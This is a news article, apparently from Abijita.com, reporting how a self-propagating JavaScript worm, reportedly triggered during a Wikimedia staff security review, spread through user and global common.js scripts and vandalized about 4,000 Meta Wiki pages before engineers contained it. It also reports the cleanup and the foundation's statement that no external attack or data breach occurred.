The Wikimedia Foundation experienced a security incident after a self-propagating JavaScript worm modified user scripts and vandalized pages on Meta Wiki.
The issue was quickly detected by editors who noticed unusual automated edits across the platform.
Users first raised alarms on Wikipedia’s Village Pump technical forum after spotting large numbers of edits that inserted hidden scripts and vandalized random pages. In response, Wikimedia engineers temporarily restricted editing across multiple projects while they investigated the problem and began reverting the malicious changes.
The incident appears to have started when a malicious JavaScript file hosted on Russian Wikipedia was executed. The script, stored at a page called User:Ololoshka562/test.js, had originally been uploaded in March 2024 and was reportedly linked to scripts used in previous attacks on wiki projects.
Based on edit history analysis, the script was triggered earlier in the day by a Wikimedia employee account during testing of user script functionality. It is not yet clear whether the script was intentionally executed, accidentally loaded during testing, or activated through a compromised account.
Once executed, the script attempted to spread by injecting malicious code into both user-specific JavaScript files and the global MediaWiki interface script. MediaWiki allows editors to customize the interface using files such as MediaWiki:Common.js and User:/common.js, which run directly in a user’s browser.
The worm attempted two types of persistence. First, it tried to overwrite a user’s personal common.js file with a loader that would automatically run the malicious script whenever the user visited the wiki while logged in. Second, if the infected account had the required permissions, it attempted to modify the global MediaWiki:Common.js file so that the malicious code would execute for all editors using the global script.
If the global script was successfully modified, anyone loading the page would unknowingly execute the malicious loader, which would then repeat the same process and attempt to spread further.
The worm also vandalized content by automatically selecting random pages using the Special:Random feature and editing them to insert an image along with hidden JavaScript code that loaded additional scripts from an external website.
Analysis indicates that around 3,996 pages were modified during the incident, and approximately 85 user common.js files were replaced by the worm. The exact number of deleted pages remains unknown.
As the attack spread, Wikimedia engineers restricted editing across projects and began removing the malicious scripts. Staff members also rolled back affected user scripts and suppressed modified pages from public change histories.
According to a statement from the Wikimedia Foundation, the malicious code was active for only about 23 minutes. During that time, it altered and deleted content on Meta Wiki, but the affected pages have since been restored.
The foundation said the incident occurred while staff were conducting a security review of user-authored code on Wikipedia and accidentally activated dormant malicious code. The organization emphasized that there is no evidence of an external attack or any breach of personal data.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
Editing across Wikimedia projects has since been restored, and the malicious code has been removed. The foundation said it is working on additional security measures to reduce the risk of similar incidents in the future.
